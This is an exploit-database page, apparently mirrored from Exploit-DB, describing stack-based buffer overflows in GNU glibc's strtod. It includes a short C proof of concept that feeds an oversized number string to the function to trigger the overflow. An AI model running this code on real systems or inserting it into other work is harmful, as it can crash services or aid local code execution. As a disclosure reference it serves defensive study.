header-logo
Suggest Exploit
vendor:
glibc
by:
SecurityFocus
7,8
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: glibc
Affected Version From: 2.14
Affected Version To: 2.17
Patch Exists: YES
Related CWE: CVE-2012-0864
CPE: a:gnu:glibc
Metasploit: https://www.rapid7.com/db/vulnerabilities/amazon-linux-ami-alas-2012-57/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2012-0864/https://www.rapid7.com/db/vulnerabilities/suse-cve-2012-0864/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2012-0864/https://www.rapid7.com/db/vulnerabilities/vmsa-2012-0018-cve-2012-0864/https://www.rapid7.com/db/vulnerabilities/vmsa-2012-0013-cve-2012-0864/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2012-0488/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2012-0531/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2012-0397/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2012-0393/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2012

GNU glibc Multiple Stack-Based Buffer-Overflow Vulnerabilities

GNU glibc is prone to multiple stack-based buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied data. Local attackers can exploit these issues to run arbitrary code with privileges of the affected application. Failed exploit attempts can result in a denial-of-service condition.

Mitigation:

Ensure that all user-supplied data is properly validated before being used.
Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/54982/info

GNU glibc is prone to multiple stack-based buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied data.

Local attackers can exploit these issues to run arbitrary code with privileges of the affected application. Failed exploit attempts can result in a denial-of-service condition. 

include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define EXPONENT "e-2147483649"
#define SIZE 214748364
int
main (void)
{
  char *p = malloc (1 + SIZE + sizeof (EXPONENT));
  if (p == NULL)
    {
      perror ("malloc");
      exit (EXIT_FAILURE);
    }
  p[0] = '1';
  memset (p + 1, '0', SIZE);
  memcpy (p + 1 + SIZE, EXPONENT, sizeof (EXPONENT));
  double d = strtod (p, NULL);
  printf ("%a\n", d);
  exit (EXIT_SUCCESS);
}

Navigation

Suggest Exploit

Services By CQR